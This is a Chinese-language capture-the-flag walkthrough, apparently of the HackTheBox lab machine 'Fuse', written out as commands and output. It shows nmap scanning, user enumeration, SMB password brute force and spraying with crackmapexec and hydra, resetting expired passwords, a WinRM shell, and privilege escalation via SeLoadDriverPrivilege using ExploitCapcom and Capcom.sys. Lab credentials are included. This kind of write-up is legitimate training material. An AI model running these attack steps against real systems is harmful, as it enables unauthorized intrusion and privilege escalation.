端口扫描
nmap -sV -A -Pn 10.10.10.193
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-03 09:15:07Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h56m49s, deviation: 4h37m10s, median: 16m47s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2022-01-03T01:15:43-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-03T09:15:39
|_ start_date: 2022-01-03T09:12:43
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 291.40 ms 10.10.14.1
2 282.69 ms 10.10.10.193
得到域名fabricorp.local,
curl http://10.10.10.193/
<meta http-equiv="refresh" content="0; url=http://fuse.fabricorp.local/papercut/logs/html/index.htm" />
把fuse.fabricorp.local也加入hosts,就可以正常跳转了
web:
PaperCut™ Print Logger,exploit-db未搜到已知exp
IIS 10.0.0
通过页面的log收集到几个用户名pmerton tlavel sthompson bhult administrator,把他们放进user.txt
#能连接但没有权限,enumusers失败
rpcclient -U "" -N 10.10.10.193
#未发现可匿名登录的共享目录
smbmap -H 10.10.10.193
已知用户名尝试asreproast
for user in $(cat user.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.193 fabricorp.local/${user} | grep -v Impacket; done
无果,
陷入僵局。wp提示使用cewl收集密码爆破
cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > pass2.txt
ps.这个--with-numbers选项很有必要,不加就没收集到正确的密码
接下来爆破smb
crackmapexec smb 10.10.10.193 -u user.txt -p pass2.txt
但是这个爆破出一个就停了
hydra -L user.txt -P pass2.txt 10.10.10.193 smb
有点奇怪,怎么也只爆出一个就停了。
总之现在我们有两个过期的密码了:
bhult Fabricorp01
tlavel Fabricorp01
smbclient -U bhult -L \\\\10.10.10.193
果然密码过期,必须更改
sudo smbpasswd -r 10.10.10.193 bhult
两个都重置为test123@
利用这两个账号重新对rpc.smb做信息收集
(密码过期的很快,时不时要重置,而且smb登不上,rpc改了之后倒是可以)
rpcclient -U bhult%test123@ 10.10.10.193
enumprinters(web就是打印机日志,倒也不是不能理解)
enumdomusers(域用户)
把域用户名放进文件,进行爆破——密码喷洒,看到底谁的密码是$fab@s3Rv1ce$1
crackmapexec smb 10.10.10.193 -u user2.txt -p '$fab@s3Rv1ce$1'
hydra -L user2.txt -p '$fab@s3Rv1ce$1' 10.10.10.193 smb
用这两账号尝试获取shell,psexec因无可写权限失败,winrm成功
whoami /priv
SeLoadDriverPrivilege enable
编译EoPLoadDriver,也可以github下一个现成的expexploitcapcom。
.\ExploitCapcom.exe LOAD C:\Users\svc-print\Documents\Capcom.sys
.\ExploitCapcom.exe EXPLOIT fuse2.exe
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。